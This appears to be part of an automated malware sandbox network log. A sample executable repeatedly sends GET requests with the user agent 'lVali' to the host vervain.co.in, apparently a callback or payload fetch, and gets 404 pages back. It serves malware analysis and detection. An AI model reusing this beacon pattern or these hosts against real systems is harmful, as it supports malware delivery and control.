                2022-08-05 13:09:50 UTC55OUTGET /3437E44F6689E610&resi25412545d3437E44F6689E61025874515/Jsibtswtoeethvjdrykaimaovwatvsk HTTP/1.1
                User-Agent: lVali
                Host: vervain.co.in
                2022-08-05 13:09:51 UTC56INHTTP/1.1 404 Not Found
                Date: Fri, 05 Aug 2022 13:09:51 GMT
                Server: Apache
                Upgrade: h2,h2c
                Connection: Upgrade, close
                Last-Modified: Tue, 15 Mar 2022 23:01:27 GMT
                Accept-Ranges: bytes
                Content-Length: 583
                Vary: Accept-Encoding
                Content-Type: text/html
                2022-08-05 13:09:51 UTC56INData Raw: 3c 68 74 6d 6c 3e 0a 3c 68 65 61 64 3e 0a 20 20 20 20 3c 73 74 79 6c 65 3e 0a 20 20 20 20 20 20 20 20 2e 6c 6f 61 64 65 72 20 7b 20 62 6f 72 64 65 72 3a 20 31 36 70 78 20 73 6f 6c 69 64 20 23 66 33 66 33 66 33 3b 20 62 6f 72 64 65 72 2d 74 6f 70 3a 20 31 36 70 78 20 73 6f 6c 69 64 20 23 33 34 39 38 64 62 3b 20 62 6f 72 64 65 72 2d 72 61 64 69 75 73 3a 20 35 30 25 3b 20 77 69 64 74 68 3a 20 31 32 30 70 78 3b 20 68 65 69 67 68 74 3a 20 31 32 30 70 78 3b 20 61 6e 69 6d 61 74 69 6f 6e 3a 20 73 70 69 6e 20 32 73 20 6c 69 6e 65 61 72 20 69 6e 66 69 6e 69 74 65 3b 20 70 6f 73 69 74 69 6f 6e 3a 20 66 69 78 65 64 3b 20 74 6f 70 3a 20 34 30 25 3b 20 6c 65 66 74 3a 20 34 30 25 3b 20 7d 0a 20 20 20 20 20 20 20 20 40 6b 65 79 66 72 61 6d 65 73 20 73 70 69 6e 20 7b 20
                Data Ascii: <html><head> <style> .loader { border: 16px solid #f3f3f3; border-top: 16px solid #3498db; border-radius: 50%; width: 120px; height: 120px; animation: spin 2s linear infinite; position: fixed; top: 40%; left: 40%; } @keyframes spin {


                Session IDSource IPSource PortDestination IPDestination PortProcess
                59192.168.2.449835199.79.62.221443C:\Users\user\Desktop\ncIpox4w8f.exe
                TimestampkBytes transferredDirectionData
                2022-08-05 13:09:51 UTC56OUTGET /3437E44F6689E610&resi25412545d3437E44F6689E61025874515/Jsibtswtoeethvjdrykaimaovwatvsk HTTP/1.1
                User-Agent: lVali
                Host: vervain.co.in
                2022-08-05 13:09:52 UTC57INHTTP/1.1 404 Not Found
                Date: Fri, 05 Aug 2022 13:09:52 GMT
                Server: Apache
                Upgrade: h2,h2c
                Connection: Upgrade, close
                Last-Modified: Tue, 15 Mar 2022 23:01:27 GMT
                Accept-Ranges: bytes
                Content-Length: 583
                Vary: Accept-Encoding
                Content-Type: text/html
                2022-08-05 13:09:52 UTC57INData Raw: 3c 68 74 6d 6c 3e 0a 3c 68 65 61 64 3e 0a 20 20 20 20 3c 73 74 79 6c 65 3e 0a 20 20 20 20 20 20 20 20 2e 6c 6f 61 64 65 72 20 7b 20 62 6f 72 64 65 72 3a 20 31 36 70 78 20 73 6f 6c 69 64 20 23 66 33 66 33 66 33 3b 20 62 6f 72 64 65 72 2d 74 6f 70 3a 20 31 36 70 78 20 73 6f 6c 69 64 20 23 33 34 39 38 64 62 3b 20 62 6f 72 64 65 72 2d 72 61 64 69 75 73 3a 20 35 30 25 3b 20 77 69 64 74 68 3a 20 31 32 30 70 78 3b 20 68 65 69 67 68 74 3a 20 31 32 30 70 78 3b 20 61 6e 69 6d 61 74 69 6f 6e 3a 20 73 70 69 6e 20 32 73 20 6c 69 6e 65 61 72 20 69 6e 66 69 6e 69 74 65 3b 20 70 6f 73 69 74 69 6f 6e 3a 20 66 69 78 65 64 3b 20 74 6f 70 3a 20 34 30 25 3b 20 6c 65 66 74 3a 20 34 30 25 3b 20 7d 0a 20 20 20 20 20 20 20 20 40 6b 65 79 66 72 61 6d 65 73 20 73 70 69 6e 20 7b 20
                Data Ascii: <html><head> <style> .loader { border: 16px solid #f3f3f3; border-top: 16px solid #3498db; border-radius: 50%; width: 120px; height: 120px; animation: spin 2s linear infinite; position: fixed; top: 40%; left: 40%; } @keyframes spin {


                Session IDSource IPSource PortDestination IPDestination PortProcess
                6192.168.2.449761199.79.62.221443C:\Users\user\Desktop\ncIpox4w8f.exe
                TimestampkBytes transferredDirectionData
                2022-08-05 13:08:29 UTC5OUTGET /3437E44F6689E610&resi25412545d3437E44F6689E61025874515/Jsibtswtoeethvjdrykaimaovwatvsk HTTP/1.1
                User-Agent: lVali
                Host: vervain.co.in
                2022-08-05 13:08:29 UTC5INHTTP/1.1 404 Not Found
                Date: Fri, 05 Aug 2022 13:08:29 GMT
                Server: Apache
                Upgrade: h2,h2c
                Connection: Upgrade, close
                Last-Modified: Tue, 15 Mar 2022 23:01:27 GMT
                Accept-Ranges: bytes
                Content-Length: 583
                Vary: Accept-Encoding
                Content-Type: text/html
                2022-08-05 13:08:29 UTC6INData Raw: 3c 68 74 6d 6c 3e 0a 3c 68 65 61 64 3e 0a 20 20 20 20 3c 73 74 79 6c 65 3e 0a 20 20 20 20 20 20 20 20 2e 6c 6f 61 64 65 72 20 7b 20 62 6f 72 64 65 72 3a 20 31 36 70 78 20 73 6f 6c 69 64 20 23 66 33 66 33 66 33 3b 20 62 6f 72 64 65 72 2d 74 6f 70 3a 20 31 36 70 78 20 73 6f 6c 69 64 20 23 33 34 39 38 64 62 3b 20 62 6f 72 64 65 72 2d 72 61 64 69 75 73 3a 20 35 30 25 3b 20 77 69 64 74 68 3a 20 31 32 30 70 78 3b 20 68 65 69 67 68 74 3a 20 31 32 30 70 78 3b 20 61 6e 69 6d 61 74 69 6f 6e 3a 20 73 70 69 6e 20 32 73 20 6c 69 6e 65 61 72 20 69 6e 66 69 6e 69 74 65 3b 20 70 6f 73 69 74 69 6f 6e 3a 20 66 69 78 65 64 3b 20 74 6f 70 3a 20 34 30 25 3b 20 6c 65 66 74 3a 20 34 30 25 3b 20 7d 0a 20 20 20 20 20 20 20 20 40 6b 65 79 66 72 61 6d 65 73 20 73 70 69 6e 20 7b 20
                Data Ascii: <html><head> <style> .loader { border: 16px solid #f3f3f3; border-top: 16px solid #3498db; border-radius: 50%; width: 120px; height: 120px; animation: spin 2s linear infinite; position: fixed; top: 40%; left: 40%; } @keyframes spin {


                Session IDSource IPSource PortDestination IPDestination PortProcess
                60192.168.2.449836199.79.62.221443C:\Users\user\Desktop\ncIpox4w8f.exe
                TimestampkBytes transferredDirectionData
                2022-08-05 13:09:53 UTC57OUTGET /3437E44F6689E610&resi25412545d3437E44F6689E61025874515/Jsibtswtoeethvjdrykaimaovwatvsk HTTP/1.1
                User-Agent: lVali
                Host: vervain.co.in
                2022-08-05 13:09:53 UTC58INHTTP/1.1 404 Not Found
                Date: Fri, 05 Aug 2022 13:09:53 GMT
                Server: Apache
                Upgrade: h2,h2c
                Connection: Upgrade, close
                Last-Modified: Tue, 15 Mar 2022 23:01:27 GMT
                Accept-Ranges: bytes
                Content-Length: 583
                Vary: Accept-Encoding
                Content-Type: text/html
                2022-08-05 13:09:53 UTC58INData Raw: 3c 68 74 6d 6c 3e 0a 3c 68 65 61 64 3e 0a 20 20 20 20 3c 73 74 79 6c 65 3e 0a 20 20 20 20 20 20 20 20 2e 6c 6f 61 64 65 72 20 7b 20 62 6f 72 64 65 72 3a 20 31 36 70 78 20 73 6f 6c 69 64 20 23 66 33 66 33 66 33 3b 20 62 6f 72 64 65 72 2d 74 6f 70 3a 20 31 36 70 78 20 73 6f 6c 69 64 20 23 33 34 39 38 64 62 3b 20 62 6f 72 64 65 72 2d 72 61 64 69 75 73 3a 20 35 30 25 3b 20 77 69 64 74 68 3a 20 31 32 30 70 78 3b 20 68 65 69 67 68 74 3a 20 31 32 30 70 78 3b 20 61 6e 69 6d 61 74 69 6f 6e 3a 20 73 70 69 6e 20 32 73 20 6c 69 6e 65 61 72 20 69 6e 66 69 6e 69 74 65 3b 20 70 6f 73 69 74 69 6f 6e 3a 20 66 69 78 65 64 3b 20 74 6f 70 3a 20 34 30 25 3b 20 6c 65 66 74 3a 20 34 30 25 3b 20 7d 0a 20 20 20 20 20 20 20 20 40 6b 65 79 66 72 61 6d 65 73 20 73 70 69 6e 20 7b 20
                Data Ascii: <html><head> <style> .loader { border: 16px solid #f3f3f3; border-top: 16px solid #3498db; border-radius: 50%; width: 120px; height: 120px; animation: spin 2s linear infinite; position: fixed; top: 40%; left: 40%; } @keyframes spin {


                Session IDSource IPSource PortDestination IPDestination PortProcess
                61192.168.2.449837199.79.62.221443C:\Users\user\Desktop\ncIpox4w8f.exe
                TimestampkBytes transferredDirectionData
                2022-08-05 13:09:54 UTC58OUTGET /3437E44F6689E610&resi25412545d3437E44F6689E61025874515/Jsibtswtoeethvjdrykaimaovwatvsk HTTP/1.1
                User-Agent: lVali
                Host: vervain.co.in
                2022-08-05 13:09:54 UTC58INHTTP/1.1 404 Not Found
                Date: Fri, 05 Aug 2022 13:09:54 GMT
                Server: Apache
                Upgrade: h2,h2c
                Connection: Upgrade, close
                Last-Modified: Tue, 15 Mar 2022 23:01:27 GMT
                Accept-Ranges: bytes
                Content-Length: 583
                Vary: Accept-Encoding
                Content-Type: text/html
                2022-08-05 13:09:54 UTC59INData Raw: 3c 68 74 6d 6c 3e 0a 3c 68 65 61 64 3e 0a 20 20 20 20 3c 73 74 79 6c 65 3e 0a 20 20 20 20 20 20 20 20 2e 6c 6f 61 64 65 72 20 7b 20 62 6f 72 64 65 72 3a 20 31 36 70 78 20 73 6f 6c 69 64 20 23 66 33 66 33 66 33 3b 20 62 6f 72 64 65 72 2d 74 6f 70 3a 20 31 36 70 78 20 73 6f 6c 69 64 20 23 33 34 39 38 64 62 3b 20 62 6f 72 64 65 72 2d 72 61 64 69 75 73 3a 20 35 30 25 3b 20 77 69 64 74 68 3a 20 31 32 30 70 78 3b 20 68 65 69 67 68 74 3a 20 31 32 30 70 78 3b 20 61 6e 69 6d 61 74 69 6f 6e 3a 20 73 70 69 6e 20 32 73 20 6c 69 6e 65 61 72 20 69 6e 66 69 6e 69 74 65 3b 20 70 6f 73 69 74 69 6f 6e 3a 20 66 69 78 65 64 3b 20 74 6f 70 3a 20 34 30 25 3b 20 6c 65 66 74 3a 20 34 30 25 3b 20 7d 0a 20 20 20 20 20 20 20 20 40 6b 65 79 66 72 61 6d 65 73 20 73 70 69 6e 20 7b 20
                Data Ascii: <html><head> <style> .loader { border: 16px solid #f3f3f3; border-top: 16px solid #3498db; border-radius: 50%; width: 120px; height: 120px; animation: spin 2s linear infinite; position: fixed; top: 40%; left: 40%; } @keyframes spin {


                Session IDSource IPSource PortDestination IPDestination PortProcess
                62192.168.2.449838199.79.62.221443C:\Users\user\Desktop\ncIpox4w8f.exe
                TimestampkBytes transferredDirectionData
                2022-08-05 13:09:55 UTC59OUTGET /3437E44F6689E610&resi25412545d3437E44F6689E61025874515/Jsibtswtoeethvjdrykaimaovwatvsk HTTP/1.1
                User-Agent: lVali
                Host: vervain.co.in
                2022-08-05 13:09:55 UTC59INHTTP/1.1 404 Not Found
                Date: Fri, 05 Aug 2022 13:09:55 GMT
                Server: Apache
                Upgrade: h2,h2c
                Connection: Upgrade, close
                Last-Modified: Tue, 15 Mar 2022 23:01:27 GMT
                Accept-Ranges: bytes
                Content-Length: 583
                Vary: Accept-Encoding
                Content-Type: text/html
                2022-08-05 13:09:55 UTC60INData Raw: 3c 68 74 6d 6c 3e 0a 3c 68 65 61 64 3e 0a 20 20 20 20 3c 73 74 79 6c 65 3e 0a 20 20 20 20 20 20 20 20 2e 6c 6f 61 64 65 72 20 7b 20 62 6f 72 64 65 72 3a 20 31 36 70 78 20 73 6f 6c 69 64 20 23 66 33 66 33 66 33 3b 20 62 6f 72 64 65 72 2d 74 6f 70 3a 20 31 36 70 78 20 73 6f 6c 69 64 20 23 33 34 39 38 64 62 3b 20 62 6f 72 64 65 72 2d 72 61 64 69 75 73 3a 20 35 30 25 3b 20 77 69 64 74 68 3a 20 31 32 30 70 78 3b 20 68 65 69 67 68 74 3a 20 31 32 30 70 78 3b 20 61 6e 69 6d 61 74 69 6f 6e 3a 20 73 70 69 6e 20 32 73 20 6c 69 6e 65 61 72 20 69 6e 66 69 6e 69 74 65 3b 20 70 6f 73 69 74 69 6f 6e 3a 20 66 69 78 65 64 3b 20 74 6f 70 3a 20 34 30 25 3b 20 6c 65 66 74 3a 20 34 30 25 3b 20 7d 0a 20 20 20 20 20 20 20 20 40 6b 65 79 66 72 61 6d 65 73 20 73 70 69 6e 20 7b 20
                Data Ascii: <html><head> <style> .loader { border: 16px solid #f3f3f3; border-top: 16px solid #3498db; border-radius: 50%; width: 120px; height: 120px; animation: spin 2s linear infinite; position: fixed; top: 40%; left: 40%; } @keyframes spin {


                Session IDSource IPSource PortDestination IPDestination PortProcess
                63192.168.2.449839199.79.62.221443C:\Users\user\Desktop\ncIpox4w8f.exe
                TimestampkBytes transferredDirectionData
                2022-08-05 13:09:56 UTC60OUTGET /3437E44F6689E610&resi25412545d3437E44F6689E61025874515/Jsibtswtoeethvjdrykaimaovwatvsk HTTP/1.1
                User-Agent: lVali
                Host: vervain.co.in
                2022-08-05 13:09:56 UTC60INHTTP/1.1 404 Not Found
                Date: Fri, 05 Aug 2022 13:09:56 GMT
                Server: Apache
                Upgrade: h2,h2c
                Connection: Upgrade, close
                Last-Modified: Tue, 15 Mar 2022 23:01:27 GMT
                Accept-Ranges: bytes
                Content-Length: 583
                Vary: Accept-Encoding
                Content-Type: text/html
                2022-08-05 13:09:56 UTC61INData Raw: 3c 68 74 6d 6c 3e 0a 3c 68 65 61 64 3e 0a 20 20 20 20 3c 73 74 79 6c 65 3e 0a 20 20 20 20 20 20 20 20 2e 6c 6f 61 64 65 72 20 7b 20 62 6f 72 64 65 72 3a 20 31 36 70 78 20 73 6f 6c 69 64 20 23 66 33 66 33 66 33 3b 20 62 6f 72 64 65 72 2d 74 6f 70 3a 20 31 36 70 78 20 73 6f 6c 69 64 20 23 33 34 39 38 64 62 3b 20 62 6f 72 64 65 72 2d 72 61 64 69 75 73 3a 20 35 30 25 3b 20 77 69 64 74 68 3a 20 31 32 30 70 78 3b 20 68 65 69 67 68 74 3a 20 31 32 30 70 78 3b 20 61 6e 69 6d 61 74 69 6f 6e 3a 20 73 70 69 6e 20 32 73 20 6c 69 6e 65 61 72 20 69 6e 66 69 6e 69 74 65 3b 20 70 6f 73 69 74 69 6f 6e 3a 20 66 69 78 65 64 3b 20 74 6f 70 3a 20 34 30 25 3b 20 6c 65 66 74 3a 20 34 30 25 3b 20 7d 0a 20 20 20 20 20 20 20 20 40 6b 65 79 66 72 61 6d 65 73 20 73 70 69 6e 20 7b 20
                Data Ascii: <html><head> <style> .loader { border: 16px solid #f3f3f3; border-top: 16px solid #3498db; border-radius: 50%; width: 120px; height: 120px; animation: spin 2s linear infinite; position: fixed; top: 40%; left: 40%; } @keyframes spin {


                Session IDSource IPSource PortDestination IPDestination PortProcess
                64192.168.2.449841199.79.62.221443C:\Users\user\Desktop\ncIpox4w8f.exe
                TimestampkBytes transferredDirectionData
                2022-08-05 13:09:57 UTC61OUTGET /3437E44F6689E610&resi25412545d3437E44F6689E61025874515/Jsibtswtoeethvjdrykaimaovwatvsk HTTP/1.1
                User-Agent: lVali
                Host: vervain.co.in
                2022-08-05 13:09:57 UTC61INHTTP/1.1 404 Not Found
                Date: Fri, 05 Aug 2022 13:09:57 GMT
                Server: Apache
                Upgrade: h2,h2c
                Connection: Upgrade, close
                Last-Modified: Tue, 15 Mar 2022 23:01:27 GMT
                Accept-Ranges: bytes
                Content-Length: 583
                Vary: Accept-Encoding
                Content-Type: text/html
                2022-08-05 13:09:57 UTC62INData Raw: 3c 68 74 6d 6c 3e 0a 3c 68 65 61 64 3e 0a 20 20 20 20 3c 73 74 79 6c 65 3e 0a 20 20 20 20 20 20 20 20 2e 6c 6f 61 64 65 72 20 7b 20 62 6f 72 64 65 72 3a 20 31 36 70 78 20 73 6f 6c 69 64 20 23 66 33 66 33 66 33 3b 20 62 6f 72 64 65 72 2d 74 6f 70 3a 20 31 36 70 78 20 73 6f 6c 69 64 20 23 33 34 39 38 64 62 3b 20 62 6f 72 64 65 72 2d 72 61 64 69 75 73 3a 20 35 30 25 3b 20 77 69 64 74 68 3a 20 31 32 30 70 78 3b 20 68 65 69 67 68 74 3a 20 31 32 30 70 78 3b 20 61 6e 69 6d 61 74 69 6f 6e 3a 20 73 70 69 6e 20 32 73 20 6c 69 6e 65 61 72 20 69 6e 66 69 6e 69 74 65 3b 20 70 6f 73 69 74 69 6f 6e 3a 20 66 69 78 65 64 3b 20 74 6f 70 3a 20 34 30 25 3b 20 6c 65 66 74 3a 20 34 30 25 3b 20 7d 0a 20 20 20 20 20 20 20 20 40 6b 65 79 66 72 61 6d 65 73 20 73 70 69 6e 20 7b 20
                Data Ascii: <html><head> <style> .loader { border: 16px solid #f3f3f3; border-top: 16px solid #3498db; border-radius: 50%; width: 120px; height: 120px; animation: spin 2s linear infinite; position: fixed; top: 40%; left: 40%; } @keyframes spin {


                Session IDSource IPSource PortDestination IPDestination PortProcess
                65192.168.2.449842199.79.62.221443C:\Users\user\Desktop\ncIpox4w8f.exe
                TimestampkBytes transferredDirectionData
                2022-08-05 13:09:58 UTC62OUTGET /3437E44F6689E610&resi25412545d3437E44F6689E61025874515/Jsibtswtoeethvjdrykaimaovwatvsk HTTP/1.1
                User-Agent: lVali
                Host: vervain.co.in
                2022-08-05 13:09:59 UTC62INHTTP/1.1 404 Not Found
                Date: Fri, 05 Aug 2022 13:09:58 GMT
                Server: Apache
                Upgrade: h2,h2c
                Connection: Upgrade, close
                Last-Modified: Tue, 15 Mar 2022 23:01:27 GMT
                Accept-Ranges: bytes
                Content-Length: 583
                Vary: Accept-Encoding
                Content-Type: text/html
                2022-08-05 13:09:59 UTC63INData Raw: 3c 68 74 6d 6c 3e 0a 3c 68 65 61 64 3e 0a 20 20 20 20 3c 73 74 79 6c 65 3e 0a 20 20 20 20 20 20 20 20 2e 6c 6f 61 64 65 72 20 7b 20 62 6f 72 64 65 72 3a 20 31 36 70 78 20 73 6f 6c 69 64 20 23 66 33 66 33 66 33 3b 20 62 6f 72 64 65 72 2d 74 6f 70 3a 20 31 36 70 78 20 73 6f 6c 69 64 20 23 33 34 39 38 64 62 3b 20 62 6f 72 64 65 72 2d 72 61 64 69 75 73 3a 20 35 30 25 3b 20 77 69 64 74 68 3a 20 31 32 30 70 78 3b 20 68 65 69 67 68 74 3a 20 31 32 30 70 78 3b 20 61 6e 69 6d 61 74 69 6f 6e 3a 20 73 70 69 6e 20 32 73 20 6c 69 6e 65 61 72 20 69 6e 66 69 6e 69 74 65 3b 20 70 6f 73 69 74 69 6f 6e 3a 20 66 69 78 65 64 3b 20 74 6f 70 3a 20 34 30 25 3b 20 6c 65 66 74 3a 20 34 30 25 3b 20 7d 0a 20 20 20 20 20 20 20 20 40 6b 65 79 66 72 61 6d 65 73 20 73 70 69 6e 20 7b 20
                Data Ascii: <html><head> <style> .loader { border: 16px solid #f3f3f3; border-top: 16px solid #3498db; border-radius: 50%; width: 120px; height: 120px; animation: spin 2s linear infinite; position: fixed; top: 40%; left: 40%; } @keyframes spin {


                Session IDSource IPSource PortDestination IPDestination PortProcess
                66192.168.2.449843199.79.62.221443C:\Users\user\Desktop\ncIpox4w8f.exe
                TimestampkBytes transferredDirectionData
                2022-08-05 13:09:59 UTC63OUTGET /3437E44F6689E610&resi25412545d3437E44F6689E61025874515/Jsibtswtoeethvjdrykaimaovwatvsk HTTP/1.1
                User-Agent: lVali
                Host: vervain.co.in
                2022-08-05 13:10:00 UTC63INHTTP/1.1 404 Not Found
                Date: Fri, 05 Aug 2022 13:10:00 GMT
                Server: Apache
                Upgrade: h2,h2c
                Connection: Upgrade, close
                Last-Modified: Tue, 15 Mar 2022 23:01:27 GMT
                Accept-Ranges: bytes
                Content-Length: 583
                Vary: Accept-Encoding
                Content-Type: text/html
                2022-08-05 13:10:00 UTC64INData Raw: 3c 68 74 6d 6c 3e 0a 3c 68 65 61 64 3e 0a 20 20 20 20 3c 73 74 79 6c 65 3e 0a 20 20 20 20 20 20 20 20 2e 6c 6f 61 64 65 72 20 7b 20 62 6f 72 64 65 72 3a 20 31 36 70 78 20 73 6f 6c 69 64 20 23 66 33 66 33 66 33 3b 20 62 6f 72 64 65 72 2d 74 6f 70 3a 20 31 36 70 78 20 73 6f 6c 69 64 20 23 33 34 39 38 64 62 3b 20 62 6f 72 64 65 72 2d 72 61 64 69 75 73 3a 20 35 30 25 3b 20 77 69 64 74 68 3a 20 31 32 30 70 78 3b 20 68 65 69 67 68 74 3a 20 31 32 30 70 78 3b 20 61 6e 69 6d 61 74 69 6f 6e 3a 20 73 70 69 6e 20 32 73 20 6c 69 6e 65 61 72 20 69 6e 66 69 6e 69 74 65 3b 20 70 6f 73 69 74 69 6f 6e 3a 20 66 69 78 65 64 3b 20 74 6f 70 3a 20 34 30 25 3b 20 6c 65 66 74 3a 20 34 30 25 3b 20 7d 0a 20 20 20 20 20 20 20 20 40 6b 65 79 66 72 61 6d 65 73 20 73 70 69 6e 20 7b 20
                Data Ascii: <html><head> <style> .loader { border: 16px solid #f3f3f3; border-top: 16px solid #3498db; border-radius: 50%; width: 120px; height: 120px; animation: spin 2s linear infinite; position: fixed; top: 40%; left: 40%; } @keyframes spin {


                Session IDSource IPSource PortDestination IPDestination PortProcess
                67192.168.2.449844199.79.62.221443C:\Users\user\Desktop\ncIpox4w8f.exe
                TimestampkBytes transferredDirectionData
                2022-08-05 13:10:00 UTC64OUTGET /3437E44F6689E610&resi25412545d3437E44F6689E61025874515/Jsibtswtoeethvjdrykaimaovwatvsk HTTP/1.1
                User-Agent: lVali
                Host: vervain.co.in
                2022-08-05 13:10:01 UTC64INHTTP/1.1 404 Not Found
                Date: Fri, 05 Aug 2022 13:10:01 GMT
                Server: Apache
                Upgrade: h2,h2c
                Connection: Upgrade, close
                Last-Modified: Tue, 15 Mar 2022 23:01:27 GMT
                Accept-Ranges: bytes
                Content-Length: 583
                Vary: Accept-Encoding
                Content-Type: text/html
                2022-08-05 13:10:01 UTC65INData Raw: 3c 68 74 6d 6c 3e 0a 3c 68 65 61 64 3e 0a 20 20 20 20 3c 73 74 79 6c 65 3e 0a 20 20 20 20 20 20 20 20 2e 6c 6f 61 64 65 72 20 7b 20 62 6f 72 64 65 72 3a 20 31 36 70 78 20 73 6f 6c 69 64 20 23 66 33 66 33 66 33 3b 20 62 6f 72 64 65 72 2d 74 6f 70 3a 20 31 36 70 78 20 73 6f 6c 69 64 20 23 33 34 39 38 64 62 3b 20 62 6f 72 64 65 72 2d 72 61 64 69 75 73 3a 20 35 30 25 3b 20 77 69 64 74 68 3a 20 31 32 30 70 78 3b 20 68 65 69 67 68 74 3a 20 31 32 30 70 78 3b 20 61 6e 69 6d 61 74 69 6f 6e 3a 20 73 70 69 6e 20 32 73 20 6c 69 6e 65 61 72 20 69 6e 66 69 6e 69 74 65 3b 20 70 6f 73 69 74 69 6f 6e 3a 20 66 69 78 65 64 3b 20 74 6f 70 3a 20 34 30 25 3b 20 6c 65 66 74 3a 20 34 30 25 3b 20 7d 0a 20 20 20 20 20 20 20 20 40 6b 65 79 66 72 61 6d 65 73 20 73 70 69 6e 20 7b 20
                Data Ascii: <html><head> <style> .loader { border: 16px solid #f3f3f3; border-top: 16px solid #3498db; border-radius: 50%; width: 120px; height: 120px; animation: spin 2s linear infinite; position: fixed; top: 40%; left: 40%; } @keyframes spin {


                Session IDSource IPSource PortDestination IPDestination PortProcess
                68192.168.2.449845199.79.62.221443C:\Users\user\Desktop\ncIpox4w8f.exe
                TimestampkBytes transferredDirectionData
                2022-08-05 13:10:02 UTC65OUTGET /3437E44F6689E610&resi25412545d3437E44F6689E61025874515/Jsibtswtoeethvjdrykaimaovwatvsk HTTP/1.1
                User-Agent: lVali
                Host: vervain.co.in
                2022-08-05 13:10:02 UTC65INHTTP/1.1 404 Not Found
                Date: Fri, 05 Aug 2022 13:10:02 GMT
                Server: Apache
                Upgrade: h2,h2c
                Connection: Upgrade, close
                Last-Modified: Tue, 15 Mar 2022 23:01:27 GMT
                Accept-Ranges: bytes
                Content-Length: 583
                Vary: Accept-Encoding
                Content-Type: text/html
                2022-08-05 13:10:02 UTC66INData Raw: 3c 68 74 6d 6c 3e 0a 3c 68 65 61 64 3e 0a 20 20 20 20 3c 73 74 79 6c 65 3e 0a 20 20 20 20 20 20 20 20 2e 6c 6f 61 64 65 72 20 7b 20 62 6f 72 64 65 72 3a 20 31 36 70 78 20 73 6f 6c 69 64 20 23 66 33 66 33 66 33 3b 20 62 6f 72 64 65 72 2d 74 6f 70 3a 20 31 36 70 78 20 73 6f 6c 69 64 20 23 33 34 39 38 64 62 3b 20 62 6f 72 64 65 72 2d 72 61 64 69 75 73 3a 20 35 30 25 3b 20 77 69 64 74 68 3a 20 31 32 30 70 78 3b 20 68 65 69 67 68 74 3a 20 31 32 30 70 78 3b 20 61 6e 69 6d 61 74 69 6f 6e 3a 20 73 70 69 6e 20 32 73 20 6c 69 6e 65 61 72 20 69 6e 66 69 6e 69 74 65 3b 20 70 6f 73 69 74 69 6f 6e 3a 20 66 69 78 65 64 3b 20 74 6f 70 3a 20 34 30 25 3b 20 6c 65 66 74 3a 20 34 30 25 3b 20 7d 0a 20 20 20 20 20 20 20 20 40 6b 65 79 66 72 61 6d 65 73 20 73 70 69 6e 20 7b 20
                Data Ascii: <html><head> <style> .loader { border: 16px solid #f3f3f3; border-top: 16px solid #3498db; border-radius: 50%; width: 120px; height: 120px; animation: spin 2s linear infinite; position: fixed; top: 40%; left: 40%; } @keyframes spin {


                Session IDSource IPSource PortDestination IPDestination PortProcess
                69192.168.2.449846199.79.62.221443C:\Users\user\Desktop\ncIpox4w8f.exe
                TimestampkBytes transferredDirectionData
                2022-08-05 13:10:03 UTC66OUTGET /3437E44F6689E610&resi25412545d3437E44F6689E61025874515/Jsibtswtoeethvjdrykaimaovwatvsk HTTP/1.1
                User-Agent: lVali
                Host: vervain.co.in
                2022-08-05 13:10:03 UTC66INHTTP/1.1 404 Not Found
                Date: Fri, 05 Aug 2022 13:10:03 GMT
                Server: Apache
                Upgrade: h2,h2c
                Connection: Upgrade, close
                Last-Modified: Tue, 15 Mar 2022 23:01:27 GMT
                Accept-Ranges: bytes
                Content-Length: 583
                Vary: Accept-Encoding
                Content-Type: text/html
                2022-08-05 13:10:03 UTC66INData Raw: 3c 68 74 6d 6c 3e 0a 3c 68 65 61 64 3e 0a 20 20 20 20 3c 73 74 79 6c 65 3e 0a 20 20 20 20 20 20 20 20 2e 6c 6f 61 64 65 72 20 7b 20 62 6f 72 64 65 72 3a 20 31 36 70 78 20 73 6f 6c 69 64 20 23 66 33 66 33 66 33 3b 20 62 6f 72 64 65 72 2d 74 6f 70 3a 20 31 36 70 78 20 73 6f 6c 69 64 20 23 33 34 39 38 64 62 3b 20 62 6f 72 64 65 72 2d 72 61 64 69 75 73 3a 20 35 30 25 3b 20 77 69 64 74 68 3a 20 31 32 30 70 78 3b 20 68 65 69 67 68 74 3a 20 31 32 30 70 78 3b 20 61 6e 69 6d 61 74 69 6f 6e 3a 20 73 70 69 6e 20 32 73 20 6c 69 6e 65 61 72 20 69 6e 66 69 6e 69 74 65 3b 20 70 6f 73 69 74 69 6f 6e 3a 20 66 69 78 65 64 3b 20 74 6f 70 3a 20 34 30 25 3b 20 6c 65 66 74 3a 20 34 30 25 3b 20 7d 0a 20 20 20 20 20 20 20 20 40 6b 65 79 66 72 61 6d 65 73 20 73 70 69 6e 20 7b 20
                Data Ascii: <html><head> <style> .loader { border: 16px solid #f3f3f3; border-top: 16px solid #3498db; border-radius: 50%; width: 120px; height: 120px; animation: spin 2s linear infinite; position: fixed; top: 40%; left: 40%; } @keyframes spin {


                Session IDSource IPSource PortDestination IPDestination PortProcess
                7192.168.2.449762199.79.62.221443C:\Users\user\Desktop\ncIpox4w8f.exe
                TimestampkBytes transferredDirectionData
                2022-08-05 13:08:30 UTC6OUTGET /3437E44F6689E610&resi25412545d3437E44F6689E61025874515/Jsibtswtoeethvjdrykaimaovwatvsk HTTP/1.1
                User-Agent: lVali
                Host: vervain.co.in
                2022-08-05 13:08:30 UTC6INHTTP/1.1 404 Not Found
                Date: Fri, 05 Aug 2022 13:08:30 GMT
                Server: Apache
                Upgrade: h2,h2c
                Connection: Upgrade, close
                Last-Modified: Tue, 15 Mar 2022 23:01:27 GMT
                Accept-Ranges: bytes
                Content-Length: 583
                Vary: Accept-Encoding
                Content-Type: text/html
